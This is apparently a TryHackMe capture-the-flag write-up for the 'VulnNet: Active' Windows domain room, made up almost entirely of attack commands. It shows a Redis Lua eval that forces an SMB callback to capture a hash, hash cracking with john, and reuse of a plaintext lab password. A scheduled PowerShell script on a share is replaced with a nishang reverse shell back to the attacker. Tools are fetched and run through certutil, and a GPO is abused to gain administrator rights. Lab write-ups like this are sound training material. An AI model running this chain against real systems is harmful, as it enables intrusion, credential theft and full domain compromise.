VulnNet: Active
Room Link: https://tryhackme.com/r/room/vulnnetactive
Scans
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/139 - NetBIOS
Kali
nbtscan $VICTIM
Kali
enum4linux $VICTIM
TCP/445 - SMB
No results. Couldn't login anonymously.
Kali
smbclient -L //$VICTIM/ TCP/6379 - Redis
Added active.thm
Kali
redis-cli -h active.thmKali(redis-cli)
config get *

Kali
responder -I ens5 -dvw Kali(redis-cli)
eval "dofile('//$KALI/share')" 0
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/ -U enterprise-security
Password: sand_0873959498
Download files
Kali
smbclient \\\\$VICTIM\\Enterprise-Share -U enterprise-security
Password: sand_0873959498Kali(smbclient)
ls
mget *
Kali
cat PurgeIrrelevantData_1826.ps1
Initial Shell
Kali
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1Kali(subl)
Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444
Kali
cp Invoke-PowerShellTcp.ps1 PurgeIrrelevantData_1826.ps1Upload payload
Kali(smbclient)
put PurgeIrrelevantData_1826.ps1After a few moments we get a connection
Kali
rlwrap nc -lvnp 4444
Privilege Escalation
Download SharpHound PS1
This failed because when running the script it would just hang and I had to reset the server. So After I tried with the exe.
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.ps1 .
python2 -m SimpleHTTPServer 82Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.ps1 SharpHound.ps1
powershell -ep bypass
.\SharpHound.ps1 Download SharpHound EXE
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.exe .
python2 -m SimpleHTTPServer 82Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.exe SharpHound.exe
SharpHound.exeTransfer results to Kali
Victim(Powershell)
copy 20240405092615_BloodHound.zip C:\Enterprise-Share\Kali(smbclient)
get 20240405092615_BloodHound.zipBloodHound
Kali #1
neo4j consoleKali #2
bloodhound --no-sandboxWe can just drag the zip file to bloodhound to import it.

Find Shortest Paths to Domain Admins

Our user enterprise-security has write access to the GPO called "SECURITY-POL-VN"


SharpGPOAbuse
Kali
git clone https://github.com/byronkg/SharpGPOAbuse.git
cp SharpGPOAbuse/SharpGPOAbuse-master/SharpGPOAbuse.exe .
python2 -m SimpleHTTPServer 82Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpGPOAbuse.exe SharpGPOAbuse.exeThis task is running one command which is to add our user enterprise-security to the administrator group
Victim(Powershell)
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
After the change is successful we just need to push the GPU for it to work.
Victim(Powershell)
gpupdate /force
Kali
psexec.py enterprise-security:sand_0873959498@$VICTIM
Last updated